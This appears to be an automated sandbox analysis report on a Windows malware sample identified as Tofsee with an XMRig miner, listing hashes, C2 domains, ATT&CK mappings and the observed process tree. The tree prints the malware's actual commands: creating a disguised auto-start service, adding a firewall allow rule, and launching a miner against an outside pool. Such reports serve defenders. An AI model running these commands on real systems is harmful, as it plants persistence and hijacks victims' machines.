Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-05-2023 11:36

General

  • Target

    file.exe

  • Size

    351KB

  • MD5

    9f95df4831aaa8dc6bd0cd4584f59e9b

  • SHA1

    14db8de87695de3074043932e8479e18ac2dd5d3

  • SHA256

    8e7b46b880092192df1a09ea0fd5878b17d1ba9ae89c5de6d61d74d1dd3e35f6

  • SHA512

    e2473f43d1898f6560935a4411de525ebdec2780d3c43132ebfec6adaa4e4de43b2af4ad4542ee1c3cd910a30718b79b04aa52143ea03c7b1edb78d495f71aee

  • SSDEEP

    6144:r/eUB2wMyGWA1qom6IvMlU9kaXOOEbLQHl2QSzVhn25Y:r/hBVPGWA106bha+OKsRSL6Y

Malware Config

Extracted

Family

tofsee

C2

vanaheim.cn

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 8 IoCs
  • Creates new service(s) 1 TTPs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3540
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\fkekncdb\
      2⤵
        PID:1504
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\auumpzdp.exe" C:\Windows\SysWOW64\fkekncdb\
        2⤵
          PID:3444
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create fkekncdb binPath= "C:\Windows\SysWOW64\fkekncdb\auumpzdp.exe /d\"C:\Users\Admin\AppData\Local\Temp\file.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:1780
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description fkekncdb "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:344
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start fkekncdb
          2⤵
          • Launches sc.exe
          PID:4616
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:3660
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3540 -s 1028
          2⤵
          • Program crash
          PID:892
      • C:\Windows\SysWOW64\fkekncdb\auumpzdp.exe
        C:\Windows\SysWOW64\fkekncdb\auumpzdp.exe /d"C:\Users\Admin\AppData\Local\Temp\file.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2464
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Sets service image path in registry
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:3644
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe --algo=cn-heavy/xhv -o fastpool.xyz:10162 -u abLocBRHmSKSwfZexhaPDFFpUd1Szsp1RWPZktGDuK2w76S3KYNSLGndi55YtoHoKYbSFMCCWjxzTfwHxZSm7sNLe2rAq4DqbAF.70000 -p x -k
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2212
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2464 -s 508
          2⤵
          • Program crash
          PID:1656
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3540 -ip 3540
        1⤵
          PID:716
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2464 -ip 2464
          1⤵
            PID:4116

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Persistence

          New Service

          1
          T1050

          Modify Existing Service

          1
          T1031

          Registry Run Keys / Startup Folder

          1
          T1060

          Privilege Escalation

          New Service

          1
          T1050

          Defense Evasion

          Modify Registry

          1
          T1112

          Discovery

          Query Registry

          1
          T1012

          System Information Discovery

          2
          T1082

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\auumpzdp.exe
            Filesize

            10.1MB

            MD5

            3100dd7cca35e40afedb05d7da809156

            SHA1

            05b9bfbf06d39348e2abda272aaee48970ed4d2f

            SHA256

            a1b2755ed0f458cc4a454f8e9744f359a60fb11366531a6787a8f3a669d67f4e

            SHA512

            c74e5118fa9430802978626fd12ac4c2c8955dbc146b74f2800a44511c132b0028d3a6f17405891d3e741823ee321a749c2b7a1aba48b05167bde5b3db2fe33f

          • C:\Windows\SysWOW64\fkekncdb\auumpzdp.exe
            Filesize

            10.1MB

            MD5

            3100dd7cca35e40afedb05d7da809156

            SHA1

            05b9bfbf06d39348e2abda272aaee48970ed4d2f

            SHA256

            a1b2755ed0f458cc4a454f8e9744f359a60fb11366531a6787a8f3a669d67f4e

            SHA512

            c74e5118fa9430802978626fd12ac4c2c8955dbc146b74f2800a44511c132b0028d3a6f17405891d3e741823ee321a749c2b7a1aba48b05167bde5b3db2fe33f

          • memory/2212-197-0x00000000012B0000-0x00000000013A1000-memory.dmp
            Filesize

            964KB

          • memory/2212-191-0x00000000012B0000-0x00000000013A1000-memory.dmp
            Filesize

            964KB

          • memory/2212-202-0x00000000012B0000-0x00000000013A1000-memory.dmp
            Filesize

            964KB

          • memory/2212-201-0x00000000012B0000-0x00000000013A1000-memory.dmp
            Filesize

            964KB

          • memory/2212-196-0x00000000012B0000-0x00000000013A1000-memory.dmp
            Filesize

            964KB

          • memory/2212-200-0x00000000012B0000-0x00000000013A1000-memory.dmp
            Filesize

            964KB

          • memory/2212-198-0x00000000012B0000-0x00000000013A1000-memory.dmp
            Filesize

            964KB

          • memory/2212-199-0x00000000012B0000-0x00000000013A1000-memory.dmp
            Filesize

            964KB

          • memory/2464-147-0x0000000000400000-0x00000000007FC000-memory.dmp
            Filesize

            4.0MB

          • memory/3540-138-0x0000000002540000-0x0000000002553000-memory.dmp
            Filesize

            76KB

          • memory/3540-141-0x0000000000400000-0x00000000007FC000-memory.dmp
            Filesize

            4.0MB

          • memory/3644-170-0x0000000000A80000-0x0000000000A90000-memory.dmp
            Filesize

            64KB

          • memory/3644-176-0x0000000000A80000-0x0000000000A90000-memory.dmp
            Filesize

            64KB

          • memory/3644-163-0x0000000000A80000-0x0000000000A90000-memory.dmp
            Filesize

            64KB

          • memory/3644-164-0x0000000000A80000-0x0000000000A90000-memory.dmp
            Filesize

            64KB

          • memory/3644-165-0x0000000000A80000-0x0000000000A90000-memory.dmp
            Filesize

            64KB

          • memory/3644-166-0x0000000000A80000-0x0000000000A90000-memory.dmp
            Filesize

            64KB

          • memory/3644-167-0x0000000000A80000-0x0000000000A90000-memory.dmp
            Filesize

            64KB

          • memory/3644-168-0x0000000000A80000-0x0000000000A90000-memory.dmp
            Filesize

            64KB

          • memory/3644-169-0x0000000000A80000-0x0000000000A90000-memory.dmp
            Filesize

            64KB

          • memory/3644-159-0x0000000000A80000-0x0000000000A90000-memory.dmp
            Filesize

            64KB

          • memory/3644-171-0x0000000000A80000-0x0000000000A90000-memory.dmp
            Filesize

            64KB

          • memory/3644-172-0x0000000000A80000-0x0000000000A90000-memory.dmp
            Filesize

            64KB

          • memory/3644-173-0x0000000000A80000-0x0000000000A90000-memory.dmp
            Filesize

            64KB

          • memory/3644-174-0x0000000000A80000-0x0000000000A90000-memory.dmp
            Filesize

            64KB

          • memory/3644-175-0x0000000000A80000-0x0000000000A90000-memory.dmp
            Filesize

            64KB

          • memory/3644-162-0x0000000000A80000-0x0000000000A90000-memory.dmp
            Filesize

            64KB

          • memory/3644-177-0x0000000000A80000-0x0000000000A90000-memory.dmp
            Filesize

            64KB

          • memory/3644-178-0x0000000000A80000-0x0000000000A90000-memory.dmp
            Filesize

            64KB

          • memory/3644-179-0x00000000017E0000-0x00000000017E5000-memory.dmp
            Filesize

            20KB

          • memory/3644-182-0x00000000017E0000-0x00000000017E5000-memory.dmp
            Filesize

            20KB

          • memory/3644-183-0x0000000007780000-0x0000000007B8B000-memory.dmp
            Filesize

            4.0MB

          • memory/3644-186-0x0000000007780000-0x0000000007B8B000-memory.dmp
            Filesize

            4.0MB

          • memory/3644-187-0x00000000017F0000-0x00000000017F7000-memory.dmp
            Filesize

            28KB

          • memory/3644-156-0x00000000005F0000-0x00000000005F6000-memory.dmp
            Filesize

            24KB

          • memory/3644-155-0x0000000002000000-0x000000000220F000-memory.dmp
            Filesize

            2.1MB

          • memory/3644-152-0x0000000002000000-0x000000000220F000-memory.dmp
            Filesize

            2.1MB

          • memory/3644-151-0x0000000000420000-0x0000000000435000-memory.dmp
            Filesize

            84KB

          • memory/3644-149-0x0000000000420000-0x0000000000435000-memory.dmp
            Filesize

            84KB

          • memory/3644-148-0x0000000000420000-0x0000000000435000-memory.dmp
            Filesize

            84KB

          • memory/3644-146-0x0000000000420000-0x0000000000435000-memory.dmp
            Filesize

            84KB

          • memory/3644-143-0x0000000000420000-0x0000000000435000-memory.dmp
            Filesize

            84KB